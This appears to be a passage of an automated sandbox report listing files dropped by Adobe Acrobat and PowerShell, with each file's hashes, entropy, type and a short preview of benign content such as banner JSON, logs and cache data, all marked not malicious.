                      SHA-512:5BD77E0A5077434E66A5B9240FFA1806B9710270828E81B293AB5B8152011FF4EDCF506F33F10ADC7014255F151BDDD942E8032E6ABA95F8CE8462AB9D443A79
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.260306546338378
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfzdPeUkwRe9:YvXKXDDI+KW5YpW76VeGb8Ukee9
                      MD5:DA6B7A5337B3DF425F7296220B14B77F
                      SHA1:B71ABBE60C26F4D06F5D388BC26C0BFC14BE7B70
                      SHA-256:CEE66E57F14EA977ED61DF7C693F690A2ADCD0BB7AC06E5C9F8E261344EA53A6
                      SHA-512:A7C091A3D7EE4558ABDFB98791CC8F7474A43022E13E4625B74248788F994176A8B174EACE93A34CC6268132E3E8C2CCD7FC38B2CA3918804206FDBBBB95D015
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):289
                      Entropy (8bit):5.240001668202997
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfYdPeUkwRe9:YvXKXDDI+KW5YpW76VeGg8Ukee9
                      MD5:92DD829F2E2C99CD47C606ED37913E8A
                      SHA1:708A7A67645443FDDB1263B990BB64E0535E8895
                      SHA-256:63785225A7AE97778F18D7205154BF273C961AA18CF984553F1D6A6893272C63
                      SHA-512:7C16C85CDE6D46DE9A4387CC7C74C6ED474F59C7019E5DCFB2A0CA00A845A6F08CE34C6EC7979A5EE40EEE8488DFBA342D295B574BECC77BD2F70E1924D3A00F
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):284
                      Entropy (8bit):5.2252947232951135
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJf+dPeUkwRe9:YvXKXDDI+KW5YpW76VeG28Ukee9
                      MD5:873D567403A3532B14F1463367FF8175
                      SHA1:2DAC17ADE1A65321A50F96C08FEDC15CE39D20FD
                      SHA-256:6E65FC651F6920BAEEE119E50295F0CB646EDAF446FA3DFB294E1E3B30C0E36A
                      SHA-512:32F026B389E470507CCAD5B0FED8DD93854AC3AB5798CBED12EFD4473A4EE309F0C465991603D51FFAF4AB0B18CA9D290691FC56EF4FBD937BA1CD59290E51B9
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):291
                      Entropy (8bit):5.223961125545569
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfbPtdPeUkwRe9:YvXKXDDI+KW5YpW76VeGDV8Ukee9
                      MD5:BE34134A7FD168691BF4E83B7D1C0B8C
                      SHA1:8C5BF19636E679EC867FB8BE8D22AC8E44086AEC
                      SHA-256:0472788129D8F0EB7611C4EA6E68558574466AA0515AEEB1DFD871B3C3952F92
                      SHA-512:E011E50418530209804208A0EC0E3D17E06FD3B131477D6ACCCE68879788A9E1914BA88E321E5DE97149D13EC764CC57F229C8D076452F7610749BEA1A343B78
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):287
                      Entropy (8bit):5.225099743905361
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJf21rPeUkwRe9:YvXKXDDI+KW5YpW76VeG+16Ukee9
                      MD5:5D621CAD8936DFB2A13A431E8EDDF988
                      SHA1:F224629503EDA57503CFE3968C881FC2F073CBF1
                      SHA-256:153AAED0E303B56B3F880C465BA63A4236467BD01A30F31C44B5375F7FB96228
                      SHA-512:8F611F9CFB5FA1D1321543266F50E068AB0673477CF52AE0ED0D9B1BC5E5F391CD61B11D27A717B0FF218B2CC67564AC2D04168C7F5ADFD3DCC97A2E03540D5A
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1090
                      Entropy (8bit):5.654325238097656
                      Encrypted:false
                      SSDEEP:24:Yv6XDDGliEamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSn:YvOGMCBgkDMUJUAh8cvMn
                      MD5:C75058147E6F00F45D1F1BA506125966
                      SHA1:A9E5F2484E28C378EBE2988907278911C2A51691
                      SHA-256:A437000EAD7A72AC464D3EA3816D61B25E348D062BCDA4591FE1AFFC3B72BAC1
                      SHA-512:D8A871D81515D67EA3BBA031F4ADF4E1F1D5C054555F0EB30B2F43C3207C1C691C862348A9ED5D607FD22CEC525E3C7F23D0A8391115E6FE3903452AD392EAFE
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):286
                      Entropy (8bit):5.200223564606673
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJfshHHrPeUkwRe9:YvXKXDDI+KW5YpW76VeGUUUkee9
                      MD5:608193D061AF9043224249989DC78B8B
                      SHA1:06BBE359E4629F0B2F3C2BDBB98528E539825540
                      SHA-256:E94C9E5EEA81629ACC3A7644AE9B6068B5E285205EA20F8D488E8A32C10D3C33
                      SHA-512:688F931FA5D43E7C69FD276FD999CF73BF75F00A5E61F707F25EFDDB6B288DCFCBE931D908D17FC173B97CF51AF00FEF58A7677B2B9D1C467347A3F7F031ED24
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):282
                      Entropy (8bit):5.211514913171498
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJTqgFCrPeUkwRe9:YvXKXDDI+KW5YpW76VeGTq16Ukee9
                      MD5:B1D68A7E6C00DE6D8574E6FE3AD18364
                      SHA1:D510953E39B6E7D70C5AFE814CCF35E3EB41AC99
                      SHA-256:2273E542BA1DFA6576BCF1A112E70D304AB72A3C3E177276E4E25BE0F7CA3560
                      SHA-512:40F558AF1AAAC69FB3FEC30331723550C59F24B196013C61C695B4D0A452D51593CC009794A2604DC04522ABFCB9040121144F246A1C6EC95016B7A8205745A9
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4
                      Entropy (8bit):0.8112781244591328
                      Encrypted:false
                      SSDEEP:3:e:e
                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                      Malicious:false
                      Preview:....
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):2814
                      Entropy (8bit):5.144906687109705
                      Encrypted:false
                      SSDEEP:24:Y2z/a3/HayzBZTBLqE8q/0dhjZB8Pj0SfVCL2om3/2LSRCZMDsavxH+M5w99lunj:Y2alVqRZB8bCDm3//KMDsavxdq99y
                      MD5:55D71F527870401165F96BFFD3FA669E
                      SHA1:0C790E6E4D5039416DC4F1AB7A193842671C9200
                      SHA-256:7F4463B4560C03FAA9A6FF2A25E1F2DE420E128B0527AB16F38456184016B8BD
                      SHA-512:47E0739D15877CD73F32B364D39922DB711DC05393196E727E154CA0569638386508FCD928E6FE91785502E99E728E3BCA7412C0706A9F6B5CFEB6788B079513
                      Malicious:false
                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3e5eb4dac162f4a158659ab543648fc2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736925195000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"707ef574b4f6d0740cf0419385a4e8ab","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736925195000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"caffc7ac03acc37af812ca6ab07d6ee2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736925195000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"0b44359ea7a42ec5189f3289994e079f","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736925195000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a946d63f6eb3da1012b7e5cd5f87a83f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736925195000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2344bd7cdcfb1868123430bccc0b4cd7","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                      Category:dropped
                      Size (bytes):12288
                      Entropy (8bit):0.9855119401347064
                      Encrypted:false
                      SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpxNkKn4zJwtNBwtNbRZ6bRZ4gNkKnF:TVl2GL7ms6ggOVpTkK4zutYtp6PxkKF
                      MD5:44EC5C06C10E448D65E4550056DA16D2
                      SHA1:F11BDE74D91BB89B157FFC7CCE60971004E149B5
                      SHA-256:8A6E573978C7EA43BFEA50C5FDA1658E43893691C73F4B85F6B821669A891523
                      SHA-512:5CC72C802CE15A22697FCBA25EB84F1449F0928A2E3847CDBEF30A66F40629114FA2377518E671B9F72A1E6A65C203EE643547625CB05E1C29D077A57A51A608
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite Rollback Journal
                      Category:dropped
                      Size (bytes):8720
                      Entropy (8bit):1.3399520541891974
                      Encrypted:false
                      SSDEEP:24:7+trAD1RZKHs/Ds/SpxNkKnPzJwtNBwtNbRZ6bRZWf1RZKeqLBx/XYKQvGJF7urP:7MrGgOVpTkKPzutYtp6PMTqll2GL7ms2
                      MD5:E172BAD1ECDDF90E48F5A806689BB27F
                      SHA1:28E2FFDA42D0E825D248A61719E4A0C5B39A690B
                      SHA-256:ACAE3C7836997BAD86228DC9AB073D5B2EDB2B184B518F67FF46CB309A5C2094
                      SHA-512:8BCD34B54E204EB98EC92297FDAA2DAAD2F04D0949B3589BC52D8DF751B02CC2393DBAE3E656F930545AE891CDC86704F0C851B2A69B6C88000DC7B5391D96D3
                      Malicious:false
                      Preview:.... .c.......Q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):66726
                      Entropy (8bit):5.392739213842091
                      Encrypted:false
                      SSDEEP:768:RNOpblrU6TBH44ADKZEgZCR683tGedFeVy1WQVqTFgswY9Yyu:6a6TZ44ADEZCRvtGewy18X9K
                      MD5:CB2E2B1BE7F6903EFFF6A04EEE47D706
                      SHA1:6DDDB55C74047347E8B2A0C09BC68E0A5AC0BC57
                      SHA-256:CE19C516C5436BE97C7C5421FC5603EABF8D78B56460ABD57ACB5498A8B4E0BB
                      SHA-512:6B9C1AFD4DCF6CEB6CCAF6383B78C61E75AB3F3B112E2DA1B26DD0405B4A2E2D62A5CD16946FC44A88684674EC5A7705B7700C84B02B9F4C36095B7831B712EA
                      Malicious:false
                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:Nlllul/nq/llh:NllUyt
                      MD5:AB80AD9A08E5B16132325DF5584B2CBE
                      SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                      SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                      SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                      Malicious:false
                      Preview:@...e................................................@..........
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):246
                      Entropy (8bit):3.5004142083842487
                      Encrypted:false
                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+pClEl4:Qw946cPbiOxDlbYnuRKZB4
                      MD5:DA530B0FB8D17DE09573FBF631019038
                      SHA1:33E5881B36EDAFACC9223B963AF0A89C624721F5
                      SHA-256:4B5FA4E22D59E1ADE2E648C1353F086AE78D8702AB264D92A33796EF1783B30F
                      SHA-512:EE05C29BE5D7C40A3F389DD0DBC1194F58CFC33CD8985607FE5F0A52550BCFC83C7E422B767A6CDDCA2EC5503ED38F8FCA4F14E89B2998CF1995D099C316628D
                      Malicious:false
                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.0.1./.2.0.2.5. . .0.2.:.1.3.:.1.7. .=.=.=.....
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393)
                      Category:dropped
                      Size (bytes):16525
                      Entropy (8bit):5.376360055978702
                      Encrypted:false
                      SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                      MD5:1336667A75083BF81E2632FABAA88B67
                      SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                      SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                      SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                      Malicious:false
                      Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                      Category:dropped
                      Size (bytes):15114
                      Entropy (8bit):5.36454656786958
                      Encrypted:false
                      SSDEEP:384:dyWBuQcHP02FRQ2FylMuJ/gR3wvx1efTuVwVgV/js8+QoeyjvM7YKi9HCEpHWHqZ:iLFRfFguq+
                      MD5:E0374F36FBA551277389360D67FBAF43
                      SHA1:1FED157C13FBD3E379800F136C534D02515352A5
                      SHA-256:BB492E1519691B0E772D049A91F78753859C5DAD88D42E5C8640D3D9501BA3A2
                      SHA-512:EF23F0327194ECE6F33C19B1C45830283966D623CA760A43C50DF928B8C91A45DFFCE43B580AD6BF809810679BD8571FD6DC08398A4872F1AE60ADC5069A80D6
                      Malicious:false
                      Preview:SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:133-0500 ThreadID=7904 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:135-0500 ThreadID=7904 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:137-0500 ThreadID=7904 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:137-0500 ThreadID=7904 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:137-0500 ThreadID=7904 Component=ngl-lib_NglAppLib Description="SetConf
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):29752
                      Entropy (8bit):5.39433482455567
                      Encrypted:false
                      SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbE:Q
                      MD5:E9B5BD0BB924265203C478489B60FA2C
                      SHA1:2D39998EF390A7A29F0D6B4D5617618203FF4EBA
                      SHA-256:2CAC6E8E81ED95C361AF351A5F8E984B452FE66864DCEDD6F467286A9E374E19
                      SHA-512:874B222C2CAD40AB72CD4C3D76B23F65BCEF3AAC1A206ECD08EE06D84B9BF120590D59B91DE43892325C874F538BBDFED96A933059E05FDC6294F52D31390A25
                      Malicious:false
                      Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                      Category:dropped
                      Size (bytes):758601
                      Entropy (8bit):7.98639316555857
                      Encrypted:false
                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                      MD5:3A49135134665364308390AC398006F1
                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                      Malicious:false
                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                      Category:dropped
                      Size (bytes):1407294
                      Entropy (8bit):7.97605879016224
                      Encrypted:false
                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
